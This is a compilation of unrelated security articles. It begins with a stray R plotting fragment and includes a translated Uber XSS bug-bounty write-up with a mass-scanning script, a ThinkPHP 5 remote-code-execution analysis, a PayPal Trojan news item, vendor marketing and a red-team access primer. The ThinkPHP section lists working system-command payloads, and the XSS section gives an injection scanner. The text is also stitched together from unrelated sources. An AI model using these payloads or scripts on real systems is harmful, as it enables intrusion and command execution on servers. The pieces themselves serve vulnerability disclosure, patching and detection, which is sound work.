  annotate(x=(max(mat_color$x)/2)+0.05, y=(max(mat_color$y)/2)-0.05, label="The End", geom="text",
           family="Roboto Condensed", size=22, color="#000000de") +
  annotate(x=max(mat_color$x)/2, y=max(mat_color$y)/2, label="The End", geom="text",
           family="Roboto Condensed", size=22, color="#ffffffde") +
  coord_cartesian(xlim=c(0, 19), ylim=c(3, 7))

Bug hunting: how I found an XSS affecting more than 20 Uber subdomains

Hello everyone. Today I am sharing an XSS vulnerability that affects more than 20 Uber subdomains. The vulnerability sits in the redirect to uber.onelogin.com that happens during authentication on uberinternal.com, and it earned a total of $2,500 from Uber's bug bounty program.

Preliminary concepts

Before we start, we need to understand the Security Assertion Markup Language (SAML).

SAML is an XML-based open standard data format for exchanging authentication and authorization data between parties, in particular between an identity provider and a service provider. The SAML specification defines three roles: the principal (typically a user), the identity provider (IdP) and the service provider (SP). In the use case addressed by SAML, the principal requests a service from the service provider. The service provider requests and obtains an identity assertion from the identity provider. On the basis of this assertion, the service provider can make an access control decision, that is, decide whether the principal is authorized to perform the requested service.


Before delivering the identity assertion to the SP, the IdP may ask the principal for some information, such as a username and password, to authenticate the principal. SAML specifies the assertions exchanged between the three parties; in particular, the messages asserting identity are passed from the identity provider to the service provider. In SAML, one identity provider may provide SAML assertions to many service providers. Likewise, one service provider may rely on and trust assertions from many independent identity providers. See the SAML documentation for more.

Information gathering

During information gathering I found that Uber's internal site uberinternal.com was in scope, so I started enumerating its subdomains with the subdomain enumeration tool aquatone, which found a pile of subdomains and took screenshots of them.

Notably, most uberinternal.com subdomains redirect to uber.onelogin.com for authentication; OneLogin is the SAML-based service Uber uses. Interestingly, there have been many cases of SAML authentication being bypassed, including vulnerabilities affecting Uber's own services, such as example 1 and example 2.

At first I planned to look for a SAML authentication bypass. My initial target was the Uchat system, but somebody had already found that vulnerability before me, so I had to change targets.

Logging in to an uberinternal.com service involves SAML authentication: the SAML flow first sends a request to the uber.onelogin.com authentication backend, and after a successful login uber.onelogin.com returns a valid response. What interested me in this exchange was the page that receives the response from uber.onelogin.com.

So let's look at the redirect that happens when uberinternal.com authenticates. In the screenshot below you can see that it passes a base64-encoded SAMLRequest parameter to uber.onelogin.com:


To decode this base64 parameter we can use the SAML Decoder in the online tool samltool. After decoding, you can see that it contains the link that will receive the response from uber.onelogin.com, also known as the SAML consume URL:

https://carbon-prototype.uberinternal.com:443/oidauth/saml_consume


If you want to dig deeper into the SAML interaction during this redirect, Burp Suite has a plugin dedicated to testing SAML, which is very well suited to it. In the end, though, I wrote my own small tool, SAMLExtractor, which decodes the redirect and extracts the SAML consume URL that receives the response.
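The decoding step described above, as an added example in Python (not code from the original write-up or from the author's SAMLExtractor tool). It builds a constructed AuthnRequest for a made-up SP and IdP, encodes it the way the SAML HTTP-Redirect binding does (raw DEFLATE, then base64, then URL-encoding), and then reverses the process to pull out the AssertionConsumerServiceURL, which is the "SAML consume URL" the article is after. The POST binding (base64 only) is handled too, since the same decoder is useful on a SAMLRequest captured from a form.

```python
import base64
import zlib
import xml.etree.ElementTree as ET
from typing import Optional
from urllib.parse import parse_qs, quote, unquote, urlsplit

SAMLP_NS = "urn:oasis:names:tc:SAML:2.0:protocol"

# Constructed AuthnRequest for the demo; the IdP and SP hostnames are made up.
SAMPLE_AUTHN_REQUEST = (
    '<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
    'xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" '
    'ID="_8f3a2c" Version="2.0" IssueInstant="2018-11-14T01:32:46Z" '
    'Destination="https://idp.example.com/trust/saml2/http-redirect/sso" '
    'ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" '
    'AssertionConsumerServiceURL="https://sp.example.internal:443/oidauth/saml_consume">'
    '<saml:Issuer>https://sp.example.internal/oidauth</saml:Issuer>'
    '</samlp:AuthnRequest>'
)


def encode_redirect_binding(authn_request_xml: str) -> str:
    """HTTP-Redirect binding: raw DEFLATE (no zlib header), then base64."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    data = comp.compress(authn_request_xml.encode("utf-8")) + comp.flush()
    return base64.b64encode(data).decode("ascii")


def encode_post_binding(authn_request_xml: str) -> str:
    """HTTP-POST binding: base64 only, no compression."""
    return base64.b64encode(authn_request_xml.encode("utf-8")).decode("ascii")


def decode_saml_request(value: str) -> str:
    """Reverse either binding. Spaces are turned back into '+' because
    form decoding maps '+' to ' ' and base64 never contains spaces."""
    raw = base64.b64decode(unquote(value).replace(" ", "+"))
    if raw.startswith(b"<"):                       # POST binding: already XML
        return raw.decode("utf-8")
    return zlib.decompress(raw, -15).decode("utf-8")  # Redirect binding: inflate raw DEFLATE


def extract_consume_url(authn_request_xml: str) -> Optional[str]:
    """Return the AssertionConsumerServiceURL: the SP endpoint the IdP will POST its response to."""
    root = ET.fromstring(authn_request_xml)
    if root.tag != "{%s}AuthnRequest" % SAMLP_NS:
        return None
    return root.attrib.get("AssertionConsumerServiceURL")


def consume_url_from_redirect(redirect_url: str) -> Optional[str]:
    """Given the IdP redirect URL captured from the browser, pull out the SP's consume URL."""
    params = parse_qs(urlsplit(redirect_url).query)
    if "SAMLRequest" not in params:
        return None
    return extract_consume_url(decode_saml_request(params["SAMLRequest"][0]))


# Constructed redirect, shaped like the one the SP sends the browser to the IdP with.
SAMPLE_REDIRECT = (
    "https://idp.example.com/trust/saml2/http-redirect/sso?SAMLRequest="
    + quote(encode_redirect_binding(SAMPLE_AUTHN_REQUEST), safe="")
    + "&RelayState=%2F"
)

if __name__ == "__main__":
    print(consume_url_from_redirect(SAMPLE_REDIRECT))
```

Run over a list of captured redirect URLs, `consume_url_from_redirect` gives the same per-subdomain list of `/oidauth/saml_consume` endpoints that the article later feeds into its scanning script; the `oidauth` path prefix is what that script then rewrites.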

Next, I wanted to try bypassing the SAML authentication on the consume URL above. Since I did not know the mechanism that well, I decided to run the following dirsearch command to see whether there were other directories or files under oidauth:

./dirsearch.py -u https://carbon-prototype.uberinternal.com:443/oidauth/ -ejson

Vulnerability discovery

After some brute forcing, I found the following page under the oidauth directory:

https://carbon-prototype.uberinternal.com:443/oidauth/logout

It is a logout page. Why did I find that interesting? Because many web developers implement a redirect on such logout pages, and sometimes these pages contain XSS vulnerabilities. When I opened the link above in a browser, it redirected to this page:

https://carbon-prototype.uberinternal.com/oidauth/prompt?base=https%3A%2F%2Fcarbon-prototype.uberinternal.com%3A443%2Foidauth&return_to=%2F%3Fopenid_c%3D1542156766.5%2FSnNQg%3D%3D&splash_disabled=1

The URL-decoded link looks like this:

https://carbon-prototype.uberinternal.com/oidauth/prompt?base=https://carbon-prototype.uberinternal.com:443/oidauth&return_to=/?openid_c=1542156766.5/SnNQg==&splash_disabled=1

Note the base parameter: it is used to fetch another URL, "carbon-prototype.uberinternal.com:443". When I replaced it with the classic javascript:alert(123), the XSS fired! On top of that, the page was also vulnerable to clickjacking, so in an exploitation scenario the XSS and the clickjacking can be combined to make the attack more convenient.
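Why HTML-escaping alone does not save a parameter like base=, and what a correct check looks like, as an added example in Python (not code from the original article or from Uber). The article does not show how the prompt page used the parameter, so the vulnerable renderer below, which drops base= into an href, is an assumption; the allowlist hostname, the default fallback and the probe strings are likewise made up for the demo.

```python
from html import escape
from typing import Dict, Iterable
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts the prompt page may send the user back to
ALLOWED_HOSTS = {"carbon-prototype.uberinternal.com"}
DEFAULT_BASE = "https://carbon-prototype.uberinternal.com/oidauth"


def render_prompt_vulnerable(base: str) -> str:
    """Assumed shape of the bug: base= is reflected into an href after HTML-escaping only.
    'javascript:alert(123)' contains no HTML metacharacters, so escaping leaves it intact
    and the link executes script in the page's origin when clicked."""
    return '<a href="%s">Continue</a>' % escape(base, quote=True)


def is_safe_base(base: str, allowed_hosts: Iterable[str]) -> bool:
    """Accept only absolute https URLs whose host is on the allowlist.
    Parsing (rather than prefix matching) defeats javascript:, scheme-relative //host,
    user@host and fragment (#@host) tricks, and ignores the :443 port suffix."""
    parts = urlsplit(base.strip())
    if parts.scheme.lower() != "https":
        return False
    host = parts.hostname  # lowercased, with port and userinfo stripped
    return host is not None and host in set(allowed_hosts)


def render_prompt_hardened(base: str, allowed_hosts: Iterable[str], default: str = DEFAULT_BASE) -> str:
    """Fall back to a fixed default instead of reflecting anything that fails the check."""
    target = base if is_safe_base(base, allowed_hosts) else default
    return '<a href="%s">Continue</a>' % escape(target, quote=True)


# Constructed probe values: the legitimate one from the article, then common bypass attempts
PROBES = [
    "https://carbon-prototype.uberinternal.com:443/oidauth",
    "javascript:alert(123)",
    "JaVaScRiPt:alert(123)",
    "//evil.example/",
    "https://carbon-prototype.uberinternal.com@evil.example/",
    "https://evil.example/#@carbon-prototype.uberinternal.com",
]


def check_probes(probes: Iterable[str] = PROBES) -> Dict[str, bool]:
    """Map each probe to whether the hardened check would accept it."""
    return {p: is_safe_base(p, ALLOWED_HOSTS) for p in probes}


if __name__ == "__main__":
    for probe, ok in check_probes().items():
        print("%-60s %s" % (probe, "allowed" if ok else "rejected"))
```

The same scheme-and-host check applies whether the value ends up in an href, in a Location header or in a `window.location` assignment; the point is to decide on the parsed URL, not on the string.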


Further findings

Using the batch SAML-consume-URL discovery feature of my SAMLExtractor tool, I tested every uberinternal.com subdomain to see whether any others used the same mechanism. In my adapted script, I request the vulnerable page oidauth/prompt in place of the consume endpoint and try the javascript:alert(123) XSS; wherever the XSS exists, the javascript:alert(123) is reflected back nicely!

import requests
import urllib3
from colorama import init, Fore

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
init()

# one SAML consume URL per line, as extracted by SAMLExtractor
with open("/home/fady/uberSAMLOIDAUTH") as urlList:
    for url in urlList:
        # swap the saml_consume path for the prompt page and put the payload into base=
        url2 = url.strip().split("oidauth")[0] + "oidauth/prompt?base=javascript%3Aalert(123)%3B%2F%2FFady&return_to=%2F%3Fopenid_c%3D1520758585.42StPDwQ%3D%3D&splash_disabled=1"
        request = requests.get(url2, allow_redirects=True, verify=False)
        doesit = Fore.RED + "no"
        # the marker "Fady" only comes back if the payload was reflected unfiltered
        if "Fady" in request.text:
            doesit = Fore.GREEN + "yes"
        print(Fore.WHITE + url2)
        print(Fore.WHITE + "Len : " + str(len(request.content)) + " Vulnerable : " + doesit)

In the end, I first found the XSS on https://eng.uberinternal.com and reported it; afterwards, using the same method, I found more than 20 uberinternal.com subdomains affected by the same XSS. The two reports earned $500 and $2,000 from Uber respectively.

For more details, see the original reports: report 1 / report 2

*Source: fady; translated by clouds. Please credit CodeSec.Net when reposting.

Gogs 0.11.79 released, a self-hosted Git service

Gogs 0.11.79 has been released. It contains security updates, so upgrading is recommended.

Bug fixes

Using dn as the user lookup attribute in LDAP did not work #4684

LDAP group verification failed #4792

Emoji were not rendered in the wiki #4869

The log level set in the configuration was not applied #5007

go get could not download from an instance served on a port other than 80 #5305

Fixed a potential CSRF vulnerability in API routes #5355

Redirected to the wrong address after updating protected-branch settings when the branch name contains # #5442

Clearing labels did not take effect #5445

[Security] Remote code execution #5469

No push-event webhook was triggered when new branches were pulled into a mirror repository #5473

Overly long issue comments overflowed the dashboard width #5502

The collaborator API did not show the corresponding permission #5538

[Security] Logout only deleted the client-side cookie #5540

[Security] Some routes must be requested with POST #5541

[Security] XSS in external issue tracker URL format links #5545

Feature improvements

Support pre-filling the title and body of a new issue via URL query parameters #5302

Support Base64-encoded images in Markdown #5391

Allow unauthenticated users to call the repository info API /repos/:username/:reponame #5475

Do you use PayPal? Beware of this Android Trojan

A new Android Trojan has been detected, and it is the kind that can literally cost you money. Pay attention, especially if you use PayPal! Initially posing as a battery optimization tool, once downloaded and installed from a third-party app store it terminates its own process and removes its icon. It does so, however, only after requesting the Accessibility permissions to "Observe your actions" and "Retrieve window content".

It scans the phone for the PayPal app and, instead of attacking the app itself, stays hidden until the user logs in. This way it also sidesteps two-factor authentication, because the legitimate user performs the login. Once the user is logged in, within about 5 seconds it sends $1,000 (or euros, or another currency depending on your location) to the attacker's PayPal address.

It repeats this several times, unless you are out of funds and no card is attached to your PayPal account. As secondary behaviour it also phishes for your Gmail password and credit card numbers using overlay attacks: screens you cannot dismiss until you actually fill in the form. The Trojan downloads HTML-based overlay screens for Google Play, WhatsApp, Skype, Viber and Gmail.

The Trojan can also be instructed to carry out other malicious actions, such as harvesting your contacts, making calls and sending texts. You can find more details at the source link below, but as a general rule of thumb, stay away from third-party app stores.


Do you use PayPal? Beware of this Android Trojan
Do you use PayPal? Beware of this Android Trojan

Discuss This Post

Next Article

Share This Post

Watch the Latest Pocketnow Videos

Via

Redmond Pie

Source

Eset

Posted In

Android , Phones , Security & Privacy

Tags

Android , News , Paypal , privacy , security , trojan

Android , News , Paypal , privacy , security , trojan

About The Author


Do you use PayPal? Beware of this Android Trojan
Anton D. Nagy

Anton is the Editor-in-Chief of Pocketnow. As publication leader, he aims to bring Pocketnow even closer to you. His vision is mainly focused on, and oriented towards, the audience. Anton’s ambition, adopted by the entire team, is to transform Pocketnow into a reference media outlet.


Do you use PayPal? Beware of this Android Trojan

ThinkPHP 5: analysis of the getshell vulnerability caused by insufficient filtering of the controller name

Vulnerability overview

On December 10, 2018, the ThinkPHP team published an important security update fixing a vulnerability. Because the framework does not check the controller name sufficiently, a remote code execution vulnerability arises when strict routing is not enabled (it is off by default). After a series of tests and source code analysis, the affected versions were determined to be:

ThinkPHP 5.0.5-5.0.22

ThinkPHP 5.1.0-5.1.30

Vulnerability analysis

The root cause is that the ThinkPHP 5 framework does not filter the controller name properly, which lets an attacker call sensitive functions inside the framework through the URL and ultimately get a shell. This article uses ThinkPHP 5.0.22 for the analysis.

The manual shows that TP5 supports several ways of defining routes:

https://www.kancloud.cn/manual/thinkphp5/118037


Two things are worth noting here: with route definition method 4, TP5 can route a request to a specified method (which must be public) of a specified class; and even when no route is defined at all, TP5 by default parses and dispatches the URL according to method 1.


Now let's look at the actual code:

thinkphp/library/think/App.php


Since no routes are defined in the configuration file, dispatch falls back to method 1 by default. If strict routing mode is enabled, an error is thrown directly.

thinkphp/library/think/Route.php


You can see that when TP5 parses the URL it only splits it on the separator, with no security check at all. Following the flow further:

thinkphp/library/think/App.php


When attacking, be sure to use a module that exists; otherwise an exception is thrown and execution stops there.


Here the controller name is taken straight from the earlier parsing result, without any security check.


Here the controller class is instantiated; let's step in:

thinkphp/library/think/Loader.php


It looks up the class corresponding to the name passed in and, if it exists, returns an instance of that class directly.

Stepping into the getModuleAndClass method:


You can see that if the controller name contains a \, it is returned as-is.

Back in the module method of thinkphp/library/think/App.php: normally this yields an instance of the corresponding controller class, but now we have an instance of \think\App instead, so any of its public methods can be called through the URL, with the extra URL parameters parsed and passed in as the method's arguments.


Determining the affected versions

While testing with a friend, I happened to notice that the existing payload did not work on version 5.0.5: it reported that the controller does not exist. Stepping through the code revealed a small difference. Below is the controller method of thinkphp/library/think/Loader.php in ThinkPHP 5.0.5:


Take the payload ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id as an example. We set the controller name to \think\app, so strpos returns 0, and because of PHP's loose typing the condition on line 407 is not entered, which makes the payload fail. Removing the leading \ makes the payload work again: ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

Looking further at ThinkPHP 5.0.0-5.0.4, these versions do not treat a \ in the controller name specially at all, and the payload does not work.

Here is the relevant code in thinkphp/library/think/Loader.php of ThinkPHP 5.0.4:


There is no special handling; every name goes through parseClass for uniform processing.


It filters out / and ., and at the end it prepends the controller class namespace, so the payload cannot work. This confirms that the affected ThinkPHP 5.0 versions are 5.0.5-5.0.22.

Exploitation

Since the attacker can call the public methods of nearly every class in a TP5 project, there are many exploitation points. Here are a few common ones; plenty more remain to be dug up.

1 index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
2 index.php?s=index/\think\container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

A payload specific to 5.1: because the code was restructured, invokefunction moved into the \think\Container class.

3 index.php?s=index/\think\request/input&filter=system&data=id

Also specific to 5.1: in 5.0 the constructor of \think\Request is protected, so it cannot be used.

......

Mitigation

Upgrade to the latest ThinkPHP release: 5.0.23 or 5.1.31.

Get into the habit of using strict routing mode; enabling it directly on a production system, however, is not recommended.

Or apply the patch directly. For ThinkPHP 5.0, add the following code at line 554 of thinkphp/library/think/App.php; for ThinkPHP 5.1, at line 63 of thinkphp/library/think/route/dispatch/Url.php:

if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}
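To make the dispatch behaviour and the patch concrete, an added example in Python (not ThinkPHP's own code): it splits the s= parameter the way the article describes default dispatch doing it, applies the patch's controller regex, and runs the result over a few constructed access-log lines to flag the payloads listed above. The module/controller/action defaults for short paths are an assumption, and the log lines are made up; the regex is the one from the patch, with re.ASCII so that \w means [A-Za-z0-9_] as it does in PCRE.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# The check added by the fix, translated to Python (re.ASCII keeps \w at [A-Za-z0-9_] like PCRE)
CONTROLLER_RE = re.compile(r"^[A-Za-z](\w|\.)*$", re.ASCII)


def controller_allowed(controller: str) -> bool:
    """True if the patched framework would accept this controller name."""
    return CONTROLLER_RE.match(controller) is not None


def parse_pathinfo(s: str) -> Tuple[str, str, str]:
    """Split s= into module/controller/action as TP5's default dispatch (route method 1) does.
    Only '/' separates segments, so a backslash-qualified class name survives as the controller."""
    parts = [p for p in s.strip("/").split("/") if p]
    parts += ["index", "Index", "index"][len(parts):]  # assumed defaults for missing segments
    return parts[0], parts[1], parts[2]


def classify_url(url: str) -> Optional[dict]:
    """Describe a request URL; None if it has no s= parameter to dispatch on."""
    query = parse_qs(urlsplit(url).query)
    if "s" not in query:
        return None
    module, controller, action = parse_pathinfo(query["s"][0])
    return {"module": module, "controller": controller, "action": action,
            "allowed": controller_allowed(controller)}


# Constructed access-log lines (combined format, shortened). Lines 2-4 carry the article's
# payload shapes; line 3 uses percent-encoded backslashes, line 4 the 5.0.5 variant without the leading one.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2018:12:00:01 +0000] "GET /index.php?s=index/user/profile HTTP/1.1" 200 1843',
    '203.0.113.7 - - [10/Dec/2018:12:00:02 +0000] "GET /index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 200 97',
    '203.0.113.9 - - [10/Dec/2018:12:00:03 +0000] "GET /index.php?s=index/%5Cthink%5Crequest/input&filter=system&data=id HTTP/1.1" 200 97',
    '198.51.100.4 - - [10/Dec/2018:12:00:04 +0000] "GET /index.php?s=index/think%5Capp/invokefunction&function=phpinfo HTTP/1.1" 200 60211',
]

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def find_exploit_attempts(log_lines) -> List[Tuple[int, str, str]]:
    """Return (line_no, controller, action) for requests whose controller fails the patched check.
    The same rule the patch enforces at dispatch time doubles as a log detection rule."""
    hits = []
    for i, line in enumerate(log_lines, 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        info = classify_url("http://x" + m.group(1))  # dummy host so urlsplit sees a full URL
        if info and not info["allowed"]:
            hits.append((i, info["controller"], info["action"]))
    return hits


if __name__ == "__main__":
    for hit in find_exploit_attempts(SAMPLE_LOG):
        print("line %d: controller %r action %r" % hit)
```

Note that `think\app` (no leading backslash) is rejected just like `\think\app`: the regex only admits letters, digits, underscore and dot after the first letter, which is why the same check closes both the 5.0.5 variant and the original payload.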

3 Ways to Improve Data Security - Centralize, Govern, Monitor

Data security is vital for every company. Additionally, data privacy has become increasingly mission critical due to GDPR and other global privacy regulations. We see evidence of this everywhere, from headlines in the press to changes in budgets and priorities. And according to CIO.com: "Data analytics and security will dominate CIO spending in 2018 and 2019."

As the demand for data privacy and security has increased, so too has the demand for access to the data necessary for continued business innovation. It is the responsibility of organizations today to bridge the gap between data supply and demand in a way that keeps data secure and compliant with privacy laws.

The architecture of the Looker data platform simplifies database security by leveraging world-class database technologies, providing comprehensive data governance, and a robust audit trail.

The benefit of a centralized database

Cloud databases such as Google BigQuery, Snowflake, and Amazon Redshift have made it easier and more economical to centralize an organization's data. When data lives in many locations, it reduces an organization's control over that data. This is why having a centralized database helps to increase security and meet modern compliance standards.

From here, whether it’s through a Looker-hosted or on-premise deployment, Looker’s architecture enables our data platform to query the centralized database directly, without moving or extracting data to workbooks, cubes, .csv files, third-party analytical databases, or desktops. This reduces the risk associated with unauthorized data access and exposure. An additional benefit of this ‘in-database’ design is that real-time data generates the freshest reports and insights.

Database Permissions: Authentication, Access Controls, and Data Governance

Your company has likely made investments in modern user authentication tools. Looker supports two-factor authentication, integrates with LDAP and SSO, and can inherit the database permissions you have already established.

Built into Looker’s platform are fine-grained access controls that provide layered levels of data governance:

Model Level - limits which models people have access to, which also controls database connections.

Group Level - limits what content people have access to in Looker.

Role Level - sets the exact feature functionality and data an individual has access to in Looker.

Historically, business users worked with or viewed reports built on data extracted outside of the secure database environment. Such data has no native access controls, which creates data security and privacy concerns. Looker runs queries against the database itself and displays the results in a web browser. When a report is shared with another employee, the second user only sees the information they have permission to access. If the report is shared with a person outside the organization, your security authorization protocols would only grant access to the Looker platform if it is set up as publicly available data. This is an example of layers of data governance providing access while protecting your data and customer privacy.

A layered approach to data governance is of particular value to industries with specialized privacy requirements: healthcare and HIPAA, financial institutions and GLBA, cardholder data and PCI. More broadly, this includes any company that collects, processes, transfers or stores EU resident data, which requires GDPR compliance.

Database Events: Auditing, Monitoring, and Logging

In the event of needing to investigate who has accessed what data, Looker provides a robust audit trail. Administrators can provide transparency to internal and external stakeholders and reveal who has accessed what data and when. The ‘in-database’ architecture means every query and viewed report creates a database event, which Looker logs. Looker has monitoring tools built into the platform. This unique ‘in-database’ architecture can also enable real-time alerting if a predefined event of interest takes place.

Additional considerations: stricter Service Level and GDPR Data Protection Agreements between organizations are promising alerts about data compromises within as little as 24 hours, because GDPR requires that data breaches be reported to a regulator within 72 hours.

If your organization’s data is floating around on multiple third-party analytics servers, downloaded to thousands of workbooks or .csv files on desktops, can your organization meet its SLA and legal obligations? With Looker, your data remains centralized, and you can instantly search a log of all those who have historically accessed that data to more quickly understand the scope and focus on areas of interest.

Move forward, securely

Demands for access to the growing volumes of data needed to drive business success are not slowing down, and neither are new data privacy regulations.

Looker’s integrations with modern authentication tools, along with layers of data governance, scale at the rate of data user growth. A robust audit trail is an insurance policy if data access questions arise. On top of that, Looker is SOC 2 Type 2 certified , demonstrating our commitment to security.

With Looker, it is in fact possible to bridge the gap between data supply and demand in a way that keeps that data secure and privacy compliant.

Data Protection on Demand Helps Orgs with Cloud HSM, Encryption & Key Mana ...

Data protection is more challenging now than it ever has been. The emergence of virtualization and cloud services, for instance, has made it difficult for organizations to uniformly safeguard their information across their IT environments. At the same time, companies must contend with advanced threats that continue to grow in number and sophistication.

Acknowledging these challenges, perhaps the best way that organizations can keep their information safe is for them to adopt a data-centric approach. This type of strategy involves companies using encryption that’s capable of providing persistent protection of sensitive data at all critical points in its lifecycle. Such protection is incomplete if organizations can’t use key management to create, distribute, store, rotate and revoke/destroy cryptographic keys as needed.

Digital security company Gemalto understands these benefits of encryption and key management. It also realizes that companies do not always have the budget or the know-how to buy, deploy and maintain hardware for these security controls, and that sometimes, even when they do, they choose not to because it is not their core competency. Hence its decision to create SafeNet Data Protection On Demand, a cloud-based platform through which companies can click and deploy cloud-based HSM, key management and encryption services without the need for additional hardware or expertise.

Gemalto has maintained from the beginning that SafeNet Data Protection On Demand can save customers time and money with its many features, which include the ability to set up a certified cloud-based HSM service and to digitally sign software and firmware packages or electronic documents. To prove this point, the security company decided to subject its solution to a rigorous review by the IAIT Test Laboratory. Dr. Götz Güttich, a well-respected senior IT consultant and editor, led a team of German IT specialists in their analysis of SafeNet Data Protection On Demand.

For the review, Gemalto made available to the researchers a test account through which they could explore the solution’s functionality. Dr. Güttich and his colleagues used that account, in turn, to create several test users and activate various services to secure their test data. In particular, they directed their efforts towards evaluating the management and configuration of the solution’s six key services: “HSM On Demand for Digital Signing,” “HSM On Demand for Hyperledger,” “Key Vault/HSM On Demand,” “HSM On Demand for Oracle TDE Database,” “Key Broker On Demand for Salesforce” and “HSM On Demand for PKI Private Key Protection.”

In the course of their analysis, Dr. Güttich and his team did come across an issue in configuring the Certificate Authority under the “PKI Private Key Protection” service. The issue specifically involved selecting a Cryptographic Service Provider (CSP) from Gemalto from a corresponding dropdown menu. Gemalto worked with the researchers to provide support so that Dr. Güttich and his colleagues could proceed with their investigation. The security firm also revised its configuration tools in the meantime to permanently resolve the issue.

But that one bug didn’t detract from the research team’s overall impressions of SafeNet Data Protection on Demand. As it explained in its summary report :

With SafeNet Data Protection on Demand, Gemalto offers an exceedingly interesting service which has the potential to also make code signing, encryption and key management available to companies for which the necessary efforts and the associated costs had previously been too much. Users of this service do not need to purchase and administrate any special hardware, and all clients pay only for the services they actually use. SafeNet Data Protection on Demand can also be a big help toward achieving GDPR conformity (in the context of the “right to be forgotten”) because stored data and keys can simply be erased whenever desired.

The researchers went on to say that the solution was “comparatively quick to set up and relatively simple to use,” with Gemalto’s technical support “convincingly good.” This finding explains what Gemalto has known all along: SafeNet Data Protection on Demand provides companies with an easy-to-use and affordable option for fulfilling their encryption and key management needs.

Want more insight from Dr. Güttich and his team? You can read their findings in full in English and German .

Indegy Offers More Holistic View of Industrial Security Threats According to 451 ...

Analysts Cite Company's Ability to Monitor both ICS Device Integrity and IT Assets in Operational Networks as Strategic Differentiator

NEW YORK (BUSINESS WIRE) #ICS Indegy, a leader in industrial cyber security, today announced that a new report by 451 Research cites the company's Indegy Industrial Cyber Security Suite as giving customers a more holistic view into the operational status and security posture of their ICS (industrial control system) networks. A complete copy of the report is available here.

"The ability to provide visibility into network operations is table stakes for any ICS security program. ICS security vendors will need to continue seeking differentiation by enriching that visibility down to the device level and offering higher order functions such as threat intelligence, incident response and vulnerability management in order to remain competitive," said Patrick Daly, Analyst with 451 Research.

According to the report, Indegy's primary differentiator comes from the fact that it has offered active detection capabilities through Device Integrity queries since 2016, whereas many of its competitors initially prioritized passive detection (and some still do). With the expansion of its platform's support beyond operational assets to IT, Indegy can discover and provide visibility into the activities of all of a customer's Windows machines, network switches, servers and other components that are critical aspects of most ICS environments. Combined with policy- and anomaly-based threat hunting, this gives customers a more holistic view and response mechanism based on the operational status and security posture of their ICS networks.

"Unlike competing solutions, Indegy has focused since day one on providing the deepest and most complete visibility, security and control for proprietary devices that control industrial processes in critical infrastructures, manufacturing, energy and water treatment," said Barak Perelman, CEO of Indegy. "Our ability to actively and passively monitor both operational and information technology assets provides customers a 360 degree view of threats regardless of whether they originate from an external attack, malicious insider or are the result of human error."

About Indegy

Indegy, a leader in industrial cyber security, protects industrial control system (ICS) networks from cyber threats, malicious insiders and human error. The Indegy Industrial Cyber Security Suite arms security and operations teams with full visibility, security and control of ICS activity and threats by combining hybrid, policy-based monitoring and network anomaly detection with unique device integrity checks. Indegy solutions are installed in manufacturing, pharmaceutical, energy, water and other industrial organizations around the world.

For more information visit www.indegy.com and follow us on Twitter and LinkedIn.

Contacts

Marc Gendron, Marc Gendron PR for Indegy, 781-237-0341, marc@mgpr.net

Red Team Assessment Phases: Gaining Access

This phase is the first of several where the red team actively interacts with the target’s environment. Some of these phases tend to blend together, as the line between gaining initial access and establishing a foothold on the target network can be a fine one. In the gaining access phase, the red team takes steps to bypass the organization’s defenses and finds a way to establish some access to internal systems. In the next phase, the team works on improving this level of access to meet the objectives of the red team operation.

Scoping the Stage

The goal of this phase of the assessment is to gain access to the target environment and an initial foothold on the target network. This can be accomplished in a variety of ways, and, in the previous phase, the red team prepares a few rough plans on how to do so. In this phase, the red team selects a plan of action and executes it. If successful, the phase is completed. Otherwise, they continue the cycle of collecting information about the target system, selecting a plan of attack, and executing the plan until successful or the assessment has been rendered impossible to complete due to the detection of the attack by security personnel.

Achieving Phase Goals

The end goal of this phase is to create a foothold on the target network. To accomplish this, the red team needs to select a plan of attack and execute it, defeating digital and/or physical defenses on their way.

Identifying a Route

If the red team has done their job properly in previous phases, they have one or more plans for breaching the target network. If they have multiple plans or flexible plans, some options may be better and less likely to be detected than others. Ideally, one plan will have a high probability of success and a low probability of detection, giving the team a solid place to start from.

Depending on the specifics of the attack plan, there may be conditions that would make the plan more or less likely to succeed. At this point in the assessment, the team should identify these conditions and determine when and how best to launch the plan. For example, a network-based attack may be more likely to succeed outside of business hours when the security team is more likely to be understaffed and the potential of sneaking past increases. Attacking physical defenses may be easier at night when lockpicking is less detectable (since it’s dark) or during shift change or smoke breaks when the increased flow of people through the organization’s defenses gives the red team member a crowd to hide in. Identifying these potential advantages and adapting the attack plan to make use of them can be crucial to the success of a red team assessment.

Defeating Defenses

The goal of the target’s security team is keeping attackers like the red team out. The main goal of this phase of the assessment is bypassing or defeating the defenses put in place to protect the target network from unauthorized access. In the course of an assessment, the red team may need to defeat both digital and physical defenses.

Digital Defenses

The goal of digital defenses is to allow all of the right people and traffic in and keep all of the wrong people and traffic out. In trying to defeat these defenses, a red team has two main options: find a hole in the defenses or bypass them by becoming one of the “right people.”

Exploiting Vulnerabilities

Security programs and defenses on the target network are software, and software has bugs. Identifying and developing exploits for these vulnerabilities is what most people picture when they think of hacking. Security software vulnerabilities can be roughly broken into design and configuration flaws and implementation errors.

Design and configuration flaws are any case that the developer or user of the software did not anticipate when it was built or set up to protect the network. Hardcoded default passwords are a design flaw that pentesters can exploit. Allowing anonymous FTP connections is an example of a configuration error. Pentesters can identify and exploit these mistakes to gain access to systems.

